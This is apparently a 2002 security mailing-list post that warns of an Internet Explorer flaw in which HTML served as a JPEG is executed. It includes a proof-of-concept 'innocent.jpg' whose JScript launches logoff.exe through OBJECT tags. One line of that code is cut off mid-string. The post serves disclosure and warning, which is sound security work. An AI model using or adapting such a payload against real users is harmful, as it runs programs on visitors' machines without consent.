|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Magnus Bodin (magnus
bodin.org)Date: Tue Mar 12 2002 - 04:32:20 CST
The latest MSIE-hole is now spreading.
THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
Content-Type if it "thinks" it knows better, then the code is executed.
This in combination with the malicious code that is possible to run, then
an "innocent.jpg" with the following content will log off an XP-user.
--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X'
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----
--
magnus MICROS~1 BOB was written in Lisp.
http://x42.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]